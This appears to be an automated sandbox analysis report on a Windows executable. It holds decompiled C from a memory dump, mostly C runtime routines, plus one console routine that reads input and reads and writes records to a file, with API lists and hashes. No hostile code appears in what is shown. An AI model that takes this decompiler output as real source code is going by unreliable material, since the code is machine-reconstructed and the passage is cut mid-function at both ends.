						_t82 = _t82 + 4;
						_t38 = E00A5E954(_a4, _a8,  *_t82);
						_t92 = _t92 + 0xc;
						if(_t38 != 0) {
							break;
						}
						_t86 = _t86 + 1;
						if(_t86 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L20;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00A55180(0, _t80);
					asm("int3");
					_push(0x14);
					_push(0xa6d430);
					E00A554B0(0, _t82, _t86);
					_t66 = 0;
					_v32 = 0;
					__eflags = _a4 - 5;
					if(__eflags <= 0) {
						_t88 = E00A5C476(_t82, __eflags);
						_v36 = _t88;
						E00A5E249(0, _t80, _t82, _t88, __eflags);
						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
						_v8 = _v8 & 0;
						_t83 = E00A54E6A(0xb8, 1);
						_v40 = _t83;
						__eflags = _t83;
						if(_t83 != 0) {
							E00A54C99(_t80, 0xc);
							_v8 = 1;
							E00A62412(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
							_v8 = _v8 & 0x00000000;
							E00A62B4F();
							_t66 = E00A62D0A(0, _t80, _t83, _t88, _t83, _a4, _a8);
							_v32 = _t66;
							__eflags = _t66;
							if(_t66 == 0) {
								E00A5E1AE(_t83);
								_t43 = E00A5E054(_t83);
							} else {
								__eflags = _a8;
								if(_a8 != 0) {
									_t60 = E00A679E3(_a8, 0xa6fcb0);
									__eflags = _t60;
									if(_t60 != 0) {
										 *0xa70bf8 = 1;
									}
								}
								E00A54C99(_t80, 0xc);
								_v8 = 2;
								_t25 = _t88 + 0x6c; // 0x6c
								E00A5E2C5(_t25, _t83);
								E00A5E1AE(_t83);
								__eflags =  *(_t88 + 0x70) & 0x00000002;
								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
									__eflags =  *0xa6fee4 & 0x00000001;
									if(( *0xa6fee4 & 0x00000001) == 0) {
										E00A5E2C5(0xa6fe1c,  *((intOrPtr*)(_t88 + 0x6c)));
										_t77 =  *0xa6fe1c; // 0xa6fe20
										_t32 = _t77 + 0x84; // 0xa6ff08
										 *0xa6ff00 =  *_t32;
										_t33 = _t77 + 0x90; // 0xa6b520
										 *0xa6ff60 =  *_t33;
										_t34 = _t77 + 0x74; // 0x1
										 *0xa6fee0 =  *_t34;
									}
								}
								_v8 = _v8 & 0x00000000;
								_t43 = E00A62B5E();
							}
						}
						_v8 = 0xfffffffe;
						E00A62B91(_t43, _t88);
						_t45 = _t66;
					} else {
						 *((intOrPtr*)(E00A553A7(__eflags))) = 0x16;
						E00A55155();
						_t45 = 0;
					}
					return E00A554F5(_t45);
				}
				L20:
			}

















                                                        0x00a629da
                                                        0x00a629dd
                                                        0x00a629e0
                                                        0x00a629e1
                                                        0x00a629e6
                                                        0x00a62a0a
                                                        0x00a62a0d
                                                        0x00a629e8
                                                        0x00a629e8
                                                        0x00a629e9
                                                        0x00a629ec
                                                        0x00a629ec
                                                        0x00a629f7
                                                        0x00a629fc
                                                        0x00a62a01
                                                        0x00000000
                                                        0x00000000
                                                        0x00a62a03
                                                        0x00a62a07
                                                        0x00000000
                                                        0x00a62a09
                                                        0x00000000
                                                        0x00a62a09
                                                        0x00000000
                                                        0x00a62a07
                                                        0x00a62a0e
                                                        0x00a62a0f
                                                        0x00a62a10
                                                        0x00a62a11
                                                        0x00a62a12
                                                        0x00a62a13
                                                        0x00a62a18
                                                        0x00a62a19
                                                        0x00a62a1b
                                                        0x00a62a20
                                                        0x00a62a25
                                                        0x00a62a27
                                                        0x00a62a2a
                                                        0x00a62a2e
                                                        0x00a62a4c
                                                        0x00a62a4e
                                                        0x00a62a51
                                                        0x00a62a56
                                                        0x00a62a5a
                                                        0x00a62a6b
                                                        0x00a62a6d
                                                        0x00a62a70
                                                        0x00a62a72
                                                        0x00a62a7a
                                                        0x00a62a80
                                                        0x00a62a8b
                                                        0x00a62a92
                                                        0x00a62a96
                                                        0x00a62aaa
                                                        0x00a62aac
                                                        0x00a62aaf
                                                        0x00a62ab1
                                                        0x00a62b6a
                                                        0x00a62b70
                                                        0x00a62ab7
                                                        0x00a62ab7
                                                        0x00a62abb
                                                        0x00a62ac5
                                                        0x00a62acc
                                                        0x00a62ace
                                                        0x00a62ad0
                                                        0x00a62ad0
                                                        0x00a62ace
                                                        0x00a62adc
                                                        0x00a62ae2
                                                        0x00a62ae9
                                                        0x00a62aee
                                                        0x00a62af4
                                                        0x00a62afc
                                                        0x00a62b00
                                                        0x00a62b02
                                                        0x00a62b09
                                                        0x00a62b13
                                                        0x00a62b1a
                                                        0x00a62b20
                                                        0x00a62b26
                                                        0x00a62b2b
                                                        0x00a62b31
                                                        0x00a62b36
                                                        0x00a62b39
                                                        0x00a62b39
                                                        0x00a62b09
                                                        0x00a62b3e
                                                        0x00a62b42
                                                        0x00a62b42
                                                        0x00a62ab1
                                                        0x00a62b77
                                                        0x00a62b7e
                                                        0x00a62b83
                                                        0x00a62a30
                                                        0x00a62a35
                                                        0x00a62a3b
                                                        0x00a62a40
                                                        0x00a62a40
                                                        0x00a62b8a
                                                        0x00a62b8a
                                                        0x00000000

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                                        • String ID:
                                                        • API String ID: 790675137-0
                                                        • Opcode ID: 4b72fba99897272d069ace78482658e475576fe2d5615d3a7587586d93dbfa7e
                                                        • Instruction ID: 2c6535f5b467900c1e82ee767208c0f0503f38ceceba39c991efd2f9030044a3
                                                        • Opcode Fuzzy Hash: 4b72fba99897272d069ace78482658e475576fe2d5615d3a7587586d93dbfa7e
                                                        • Instruction Fuzzy Hash: D841F372800704AFDB10EFA4EE42BAD77F5FF04325F10452DFD1896192DBB69A498B51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A511A0, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 163COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 79%
                                                        			E00A511A0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v20;
				char _v36;
				char _v537;
				char _v547;
				char _v572;
				char _v602;
				char _v608;
				char _v609;
				intOrPtr _v616;
				intOrPtr _v620;
				void* __ebp;
				signed int _t32;
				intOrPtr _t40;
				intOrPtr _t42;
				void* _t47;
				intOrPtr _t72;
				intOrPtr _t78;
				intOrPtr _t79;
				signed int _t113;
				void* _t114;
				void* _t118;
				void* _t121;
				void* _t122;

				_t112 = __esi;
				_t111 = __edi;
				_t81 = __ebx;
				_t32 =  *0xa6f360; // 0x51accb5
				_v8 = _t32 ^ _t113;
				_v609 = 0x59;
				E00A5401F(__ebx, __edx, __edi, __eflags, "cls");
				_push(E00A5283E());
				E00A52AB0(__ebx, __edi, __esi, __eflags);
				_t101 =  &_v36;
				E00A5359B( &_v36);
				_t40 = E00A52DAF( &_v36, "ab+");
				_t118 = _t114 + 0x14;
				_v616 = _t40;
				if(_v616 != 0) {
					goto L3;
				} else {
					_t79 = E00A52DAF( &_v36, "wb+");
					_t118 = _t118 + 8;
					_v616 = _t79;
					_t135 = _v616;
					if(_v616 != 0) {
						while(1) {
							L3:
							_t101 = _v609;
							__eflags = _v609 - 0x59;
							if(_v609 == 0x59) {
								goto L5;
							}
							__eflags = _v609 - 0x79;
							if(__eflags == 0) {
								goto L5;
							}
							_push(_v616);
							E00A52986(_t81, _t111, _t112, __eflags);
							E00A6945E(_t81, _t101, _t111, _t112, __eflags);
							goto L14;
							L5:
							_v620 = 0;
							_t42 = E00A5283E();
							__eflags = _t42;
							_push(_t42);
							E00A52AB0(_t81, _t111, _t112, __eflags);
							E00A53A3A("%s",  &_v20);
							_push(_v616);
							E00A5393A(_t81,  &_v20, _t111, _t112, __eflags);
							_t121 = _t118 + 0x10;
							while(1) {
								_t47 = E00A52FE7( &_v608, 0x23b, 1, _v616);
								_t122 = _t121 + 0x10;
								__eflags = _t47 - 1;
								if(_t47 != 1) {
									break;
								}
								_t78 = E00A54850( &_v608,  &_v20);
								_t121 = _t122 + 8;
								__eflags = _t78;
								if(_t78 == 0) {
									_v620 = 1;
								}
							}
							__eflags = _v620;
							if(__eflags == 0) {
								E00A54750( &_v608,  &_v20);
								_push(E00A5283E());
								E00A52AB0(_t81, _t111, _t112, __eflags);
								E00A5359B( &_v602);
								_push(E00A5283E());
								E00A52AB0(_t81, _t111, _t112, __eflags);
								E00A5359B( &_v572);
								_push(E00A5283E());
								E00A52AB0(_t81, _t111, _t112, __eflags);
								E00A5359B( &_v547);
								_t72 = E00A5283E();
								__eflags = _t72;
								_push(_t72);
								E00A52AB0(_t81, _t111, _t112, __eflags);
								E00A5359B( &_v537);
								_push(_v616);
								_push(1);
								_push(0x23b);
								_push( &_v608);
								E00A532F8(_t81,  &_v537, _t111, _t112, __eflags);
								_t122 = _t122 + 0x38;
							}
							_push(E00A5283E());
							E00A52AB0(_t81, _t111, _t112, __eflags);
							_t118 = _t122 + 4;
							_v609 = E00A53383();
						}
					} else {
						E00A6945E(__ebx,  &_v36, __edi, __esi, _t135);
					}
				}
				L14:
				return E00A548DC(_t81, _v8 ^ _t113, _t101, _t111, _t112);
			}



























                                                        0x00a511a0
                                                        0x00a511a0
                                                        0x00a511a0
                                                        0x00a511a9
                                                        0x00a511b0
                                                        0x00a511b3
                                                        0x00a511bf
                                                        0x00a511d6
                                                        0x00a511d7
                                                        0x00a511df
                                                        0x00a511e3
                                                        0x00a511f4
                                                        0x00a511f9
                                                        0x00a511fc
                                                        0x00a51209
                                                        0x00000000
                                                        0x00a5120b
                                                        0x00a51214
                                                        0x00a51219
                                                        0x00a5121c
                                                        0x00a51222
                                                        0x00a51229
                                                        0x00a51235
                                                        0x00a51235
                                                        0x00a51235
                                                        0x00a5123c
                                                        0x00a5123f
                                                        0x00000000
                                                        0x00000000
                                                        0x00a51248
                                                        0x00a5124b
                                                        0x00000000
                                                        0x00000000
                                                        0x00a513df
                                                        0x00a513e0
                                                        0x00a513e8
                                                        0x00000000
                                                        0x00a51251
                                                        0x00a51251
                                                        0x00a51268
                                                        0x00a51268
                                                        0x00a5126a
                                                        0x00a5126b
                                                        0x00a5127c
                                                        0x00a5128a
                                                        0x00a5128b
                                                        0x00a51290
                                                        0x00a51293
                                                        0x00a512a8
                                                        0x00a512ad
                                                        0x00a512b0
                                                        0x00a512b3
                                                        0x00000000
                                                        0x00000000
                                                        0x00a512c0
                                                        0x00a512c5
                                                        0x00a512c8
                                                        0x00a512ca
                                                        0x00a512cc
                                                        0x00a512cc
                                                        0x00a512d6
                                                        0x00a512d8
                                                        0x00a512df
                                                        0x00a512f0
                                                        0x00a51307
                                                        0x00a51308
                                                        0x00a51317
                                                        0x00a5132e
                                                        0x00a5132f
                                                        0x00a5133e
                                                        0x00a51355
                                                        0x00a51356
                                                        0x00a51365
                                                        0x00a5137a
                                                        0x00a5137a
                                                        0x00a5137c
                                                        0x00a5137d
                                                        0x00a5138c
                                                        0x00a5139a
                                                        0x00a5139b
                                                        0x00a5139d
                                                        0x00a513a8
                                                        0x00a513a9
                                                        0x00a513ae
                                                        0x00a513ae
                                                        0x00a513c0
                                                        0x00a513c1
                                                        0x00a513c6
                                                        0x00a513ce
                                                        0x00a513ce
                                                        0x00a5122b
                                                        0x00a5122b
                                                        0x00a5122b
                                                        0x00a51229
                                                        0x00a513ed
                                                        0x00a513fa

                                                        APIs
                                                        • __wsystem.LIBCMT ref: 00A511BF
                                                          • Part of subcall function 00A5401F: __wdupenv_s.LIBCMT ref: 00A54038
                                                          • Part of subcall function 00A5401F: _free.LIBCMT ref: 00A540E7
                                                          • Part of subcall function 00A52AB0: _flsall.LIBCMT ref: 00A52AC4
                                                          • Part of subcall function 00A52DAF: __fsopen.LIBCMT ref: 00A52DBA
                                                        • _wscanf.LIBCMT ref: 00A5127C
                                                        • __fread_nolock.LIBCMT ref: 00A512A8
                                                        • _strcat.LIBCMT ref: 00A512F0
                                                          • Part of subcall function 00A6945E: __lock.LIBCMT ref: 00A6946C
                                                          • Part of subcall function 00A6945E: __getch_nolock.LIBCMT ref: 00A69476
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: __fread_nolock__fsopen__getch_nolock__lock__wdupenv_s__wsystem_flsall_free_strcat_wscanf
                                                        • String ID: Y$ab+$cls$wb+
                                                        • API String ID: 2680614769-1561314148
                                                        • Opcode ID: 0213b00919188adde530e4a1a625cd4c13417ce92890041aa90fc7e43bc3cb99
                                                        • Instruction ID: 1c181e9ddad2b5d13626c986544c0f5088ef172d0261251f411ec761ab8c5d11
                                                        • Opcode Fuzzy Hash: 0213b00919188adde530e4a1a625cd4c13417ce92890041aa90fc7e43bc3cb99
                                                        • Instruction Fuzzy Hash: B551BAF2D002145AEB24B7B0EE5BBBE7238BB65302F4405B8FD0696242F6759B4CC752
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A552CB, Relevance: 13.6, APIs: 9, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A552CB(void* __eflags, signed int _a4) {
				void* _t12;
				signed int _t13;
				signed int _t16;
				intOrPtr _t18;
				void* _t22;
				signed int _t35;
				long _t40;

				_t13 = E00A56275(_t12);
				if(_t13 >= 0) {
					_t35 = _a4;
					if(E00A5D00A(_t35) == 0xffffffff) {
						L10:
						_t40 = 0;
					} else {
						_t18 =  *0xa70c20; // 0x0
						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
								goto L8;
							} else {
								goto L7;
							}
						} else {
							L7:
							_t22 = E00A5D00A(2);
							if(E00A5D00A(1) == _t22) {
								goto L10;
							} else {
								L8:
								if(CloseHandle(E00A5D00A(_t35)) != 0) {
									goto L10;
								} else {
									_t40 = GetLastError();
								}
							}
						}
					}
					E00A5CF84(_t35);
					 *((char*)( *((intOrPtr*)(0xa70c20 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
					if(_t40 == 0) {
						_t16 = 0;
					} else {
						_t16 = E00A55386(_t40) | 0xffffffff;
					}
					return _t16;
				} else {
					return _t13 | 0xffffffff;
				}
			}










                                                        0x00a552ce
                                                        0x00a552d5
                                                        0x00a552de
                                                        0x00a552eb
                                                        0x00a5533d
                                                        0x00a5533d
                                                        0x00a552ed
                                                        0x00a552ed
                                                        0x00a552f5
                                                        0x00a55303
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a5530b
                                                        0x00a5530b
                                                        0x00a5530d
                                                        0x00a5531f
                                                        0x00000000
                                                        0x00a55321
                                                        0x00a55321
                                                        0x00a55331
                                                        0x00000000
                                                        0x00a55333
                                                        0x00a55339
                                                        0x00a55339
                                                        0x00a55331
                                                        0x00a5531f
                                                        0x00a552f5
                                                        0x00a55340
                                                        0x00a55358
                                                        0x00a5535f
                                                        0x00a5536d
                                                        0x00a55361
                                                        0x00a55368
                                                        0x00a55368
                                                        0x00a55372
                                                        0x00a552d7
                                                        0x00a552db
                                                        0x00a552db

                                                        APIs
                                                        • __ioinit.LIBCMT ref: 00A552CE
                                                          • Part of subcall function 00A56275: InitOnceExecuteOnce.KERNEL32(00A70438,00A562B0,00000000,00000000,00A533D0,00A6CE88,00000018,00A535AA,?,000000FF,00000001,?,00A51790,?), ref: 00A56283
                                                        • __get_osfhandle.LIBCMT ref: 00A552E2
                                                        • __get_osfhandle.LIBCMT ref: 00A5530D
                                                        • __get_osfhandle.LIBCMT ref: 00A55316
                                                        • __get_osfhandle.LIBCMT ref: 00A55322
                                                        • CloseHandle.KERNEL32(00000000,00A51653,00000000,?,00A607D6,00A51653,?,?,?,?,?,?,?,00A51653,00000000,00000109), ref: 00A55329
                                                        • GetLastError.KERNEL32(?,00A607D6,00A51653,?,?,?,?,?,?,?,00A51653,00000000,00000109), ref: 00A55333
                                                        • __free_osfhnd.LIBCMT ref: 00A55340
                                                        • __dosmaperr.LIBCMT ref: 00A55362
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                                                        • String ID:
                                                        • API String ID: 974577687-0
                                                        • Opcode ID: 4e939da6aa920571a6e0cb14e08cd266d50b4fece279e09cb2b54355faf1465f
                                                        • Instruction ID: f2b98d3776414cff3885e72f12be3abe89219ce72758b5a62105c24c2859f800
                                                        • Opcode Fuzzy Hash: 4e939da6aa920571a6e0cb14e08cd266d50b4fece279e09cb2b54355faf1465f
                                                        • Instruction Fuzzy Hash: 4D118C32E02A206AD2306378AA75B7D27557F417F7F650709FC1ECF1D1EAB0884A8140
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A62216, Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 88%
                                                        			E00A62216(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t11;
				intOrPtr* _t17;
				void* _t29;
				intOrPtr* _t32;
				void* _t33;

				_push(8);
				_push(0xa6d408);
				_t11 = E00A554B0(__ebx, __edi, __esi);
				_t32 =  *((intOrPtr*)(_t33 + 8));
				if(_t32 != 0) {
					E00A54C99(_t29, 0xd);
					 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
					if( *(_t32 + 4) != 0 && InterlockedDecrement( *(_t32 + 4)) == 0 &&  *(_t32 + 4) != 0xa6fa68) {
						E00A54E32( *(_t32 + 4));
					}
					 *(_t33 - 4) = 0xfffffffe;
					E00A62826();
					if( *_t32 != 0) {
						E00A54C99(_t29, 0xc);
						 *(_t33 - 4) = 1;
						E00A5E1AE( *_t32);
						_t17 =  *_t32;
						if(_t17 != 0 &&  *_t17 == 0 && _t17 != 0xa6fe20) {
							E00A5E054(_t17);
						}
						 *(_t33 - 4) = 0xfffffffe;
						E00A62832();
					}
					_t11 = E00A54E32(_t32);
				}
				return E00A554F5(_t11);
			}








                                                        0x00a62781
                                                        0x00a62783
                                                        0x00a62788
                                                        0x00a6278d
                                                        0x00a62792
                                                        0x00a6279a
                                                        0x00a627a0
                                                        0x00a627a8
                                                        0x00a627c3
                                                        0x00a627c8
                                                        0x00a627c9
                                                        0x00a627d0
                                                        0x00a627d8
                                                        0x00a627dc
                                                        0x00a627e2
                                                        0x00a627eb
                                                        0x00a627f1
                                                        0x00a627f5
                                                        0x00a62804
                                                        0x00a62809
                                                        0x00a6280a
                                                        0x00a62811
                                                        0x00a62811
                                                        0x00a62817
                                                        0x00a6281c
                                                        0x00a62822

                                                        APIs
                                                        • __lock.LIBCMT ref: 00A6279A
                                                          • Part of subcall function 00A54C99: __mtinitlocknum.LIBCMT ref: 00A54CAB
                                                          • Part of subcall function 00A54C99: __amsg_exit.LIBCMT ref: 00A54CB7
                                                          • Part of subcall function 00A54C99: EnterCriticalSection.KERNEL32(?,?,00A5C53F,0000000D), ref: 00A54CC4
                                                        • InterlockedDecrement.KERNEL32(00000000), ref: 00A627AD
                                                        • _free.LIBCMT ref: 00A627C3
                                                          • Part of subcall function 00A54E32: HeapFree.KERNEL32(00000000,00000000,?,00A5C4EE,00000000,?), ref: 00A54E46
                                                          • Part of subcall function 00A54E32: GetLastError.KERNEL32(00000000,?,00A5C4EE,00000000,?), ref: 00A54E58
                                                        • __lock.LIBCMT ref: 00A627DC
                                                        • ___removelocaleref.LIBCMT ref: 00A627EB
                                                        • ___freetlocinfo.LIBCMT ref: 00A62804
                                                        • _free.LIBCMT ref: 00A62817
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 556454624-0
                                                        • Opcode ID: ef4ecfccbade16756e9d601032fe98ea05a044cf41c479fa90b31568b3ed759e
                                                        • Instruction ID: 85719cb37206b662cbf11826e94714e5e9fa72fa9f0c503b126d9f89e18efde7
                                                        • Opcode Fuzzy Hash: ef4ecfccbade16756e9d601032fe98ea05a044cf41c479fa90b31568b3ed759e
                                                        • Instruction Fuzzy Hash: 6701C031501B01EAEB34AF64EE46B9973B07F10B26F248529F8A5670D1CBB499C8CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A5C5A9, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 91%
                                                        			E00A5C5A9(void* __ebx, void* __edx, void* __edi) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t28;

				E00A53E2D(_t3);
				if(E00A54DE8() != 0) {
					_t6 = E00A54B1B(_t5, E00A5C309);
					 *0xa6fc9c = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t28 = E00A54E6A(1, 0x3b8);
						__eflags = _t28;
						if(_t28 == 0) {
							L6:
							E00A5C61F();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E00A54B45(_t9,  *0xa6fc9c, _t28);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t28);
								E00A5C4FD(__ebx, __edx, __edi, _t28, __eflags);
								_t14 = GetCurrentThreadId();
								_t28[1] = _t28[1] | 0xffffffff;
								 *_t28 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E00A5C61F();
					return 0;
				}
			}








                                                        0x00a5c5a9
                                                        0x00a5c5b5
                                                        0x00a5c5c4
                                                        0x00a5c5ca
                                                        0x00a5c5cf
                                                        0x00a5c5d2
                                                        0x00000000
                                                        0x00a5c5d4
                                                        0x00a5c5e1
                                                        0x00a5c5e5
                                                        0x00a5c5e7
                                                        0x00a5c616
                                                        0x00a5c616
                                                        0x00a5c61b
                                                        0x00a5c61e
                                                        0x00a5c5e9
                                                        0x00a5c5f7
                                                        0x00a5c5f9
                                                        0x00000000
                                                        0x00a5c5fb
                                                        0x00a5c5fb
                                                        0x00a5c5fd
                                                        0x00a5c5fe
                                                        0x00a5c605
                                                        0x00a5c60b
                                                        0x00a5c60f
                                                        0x00a5c613
                                                        0x00a5c615
                                                        0x00a5c615
                                                        0x00a5c5f9
                                                        0x00a5c5e7
                                                        0x00a5c5b7
                                                        0x00a5c5b7
                                                        0x00a5c5b7
                                                        0x00a5c5be
                                                        0x00a5c5be

                                                        APIs
                                                        • __init_pointers.LIBCMT ref: 00A5C5A9
                                                          • Part of subcall function 00A53E2D: RtlEncodePointer.NTDLL(00000000), ref: 00A53E30
                                                          • Part of subcall function 00A53E2D: __initp_misc_winsig.LIBCMT ref: 00A53E51
                                                        • __mtinitlocks.LIBCMT ref: 00A5C5AE
                                                          • Part of subcall function 00A54DE8: InitializeCriticalSectionAndSpinCount.KERNEL32(00A6F370,00000FA0,?,?,00A5C5B3,00A5498D,00A6CF48,00000014), ref: 00A54E06
                                                        • __mtterm.LIBCMT ref: 00A5C5B7
                                                        • __calloc_crt.LIBCMT ref: 00A5C5DC
                                                        • __initptd.LIBCMT ref: 00A5C5FE
                                                        • GetCurrentThreadId.KERNEL32 ref: 00A5C605
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.656525096.0000000000A51000.00000020.00020000.sdmp, Offset: 00A50000, based on PE: true
                                                        • Associated: 00000001.00000002.656517566.0000000000A50000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656546159.0000000000A6A000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656553288.0000000000A6F000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.656571370.0000000000A72000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: CountCriticalCurrentEncodeInitializePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                        • String ID:
                                                        • API String ID: 2211675822-0
                                                        • Opcode ID: c0766ff27500962b167cc582b1dafea47e47e191a2c90f38319017befac8ac9c
                                                        • Instruction ID: b7d0d70716354293fb09415f69249757d7cb0b5a818684ba62aaa9c87c1445fa
                                                        • Opcode Fuzzy Hash: c0766ff27500962b167cc582b1dafea47e47e191a2c90f38319017befac8ac9c
                                                        • Instruction Fuzzy Hash: 4DF0F6365093121DE3247B747D07A4A36A4BF017B7F205619FC60D64D6FE70854A4594
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A579A1, Relevance: 9.1, APIs: 6, Instructions: 134COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 88%
                                                        			E00A579A1(void* __eflags, signed char _a4, signed int* _a8) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t43;
				signed int _t44;
				signed int _t45;
				signed int _t48;
				signed int _t52;
				void* _t60;
				signed int _t62;
				void* _t64;
				signed int _t67;
				signed int _t70;
				signed int _t74;
				signed int _t76;
				void* _t77;
				signed int _t85;
				void* _t86;
				signed int _t87;
				signed int _t89;
				signed int* _t92;

				_t44 = E00A56275(_t43);
				if(_t44 >= 0) {
					_t92 = _a8;
					_t45 = E00A551D0(_t92);
					_t74 = _t92[3];
					_t89 = _t45;
					__eflags = _t74 & 0x00000082;
					if(__eflags != 0) {
						__eflags = _t74 & 0x00000040;
						if(__eflags == 0) {
							_t70 = 0;
							__eflags = _t74 & 0x00000001;
							if((_t74 & 0x00000001) == 0) {
								L10:
								_t48 = _t92[3] & 0xffffffef | 0x00000002;
								_t92[3] = _t48;
								_t92[1] = _t70;
								__eflags = _t48 & 0x0000010c;
								if((_t48 & 0x0000010c) == 0) {
									_t60 = E00A5283E();
									__eflags = _t92 - _t60 + 0x20;
									if(_t92 == _t60 + 0x20) {
										L13:
										_t62 = E00A5D3A5(_t89);
										__eflags = _t62;
										if(_t62 == 0) {
											goto L14;
										}
									} else {
										_t64 = E00A5283E();
										__eflags = _t92 - _t64 + 0x40;
										if(_t92 != _t64 + 0x40) {
											L14:
											E00A5D717(_t92);
										} else {
											goto L13;
										}
									}
								}
								__eflags = _t92[3] & 0x00000108;
								if((_t92[3] & 0x00000108) == 0) {
									__eflags = 1;
									_push(1);
									_v8 = 1;
									_push( &_a4);
									_push(_t89);
									_t45 = E00A557DC(_t70, _t86, _t89, _t92, 1);
									_t70 = _t45;
									goto L27;
								} else {
									_t87 = _t92[2];
									 *_t92 = _t87 + 1;
									_t76 =  *_t92 - _t87;
									_v8 = _t76;
									_t92[1] = _t92[6] - 1;
									__eflags = _t76;
									if(__eflags <= 0) {
										__eflags = _t89 - 0xffffffff;
										if(_t89 == 0xffffffff) {
											L22:
											_t77 = 0xa6f600;
										} else {
											__eflags = _t89 - 0xfffffffe;
											if(_t89 == 0xfffffffe) {
												goto L22;
											} else {
												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0xa70c20 + (_t89 >> 5) * 4));
											}
										}
										__eflags =  *(_t77 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t70);
											_push(_t70);
											_push(_t89);
											_t45 = E00A5D409(_t70, _t89, _t92, __eflags) & _t87;
											__eflags = _t45 - 0xffffffff;
											if(_t45 == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t76);
										_push(_t87);
										_push(_t89);
										_t70 = E00A557DC(_t70, _t87, _t89, _t92, __eflags);
										L25:
										_t45 = _a4;
										 *(_t92[2]) = _t45;
										L27:
										__eflags = _t70 - _v8;
										if(_t70 == _v8) {
											_t52 = _a4 & 0x000000ff;
										} else {
											L28:
											_t40 =  &(_t92[3]);
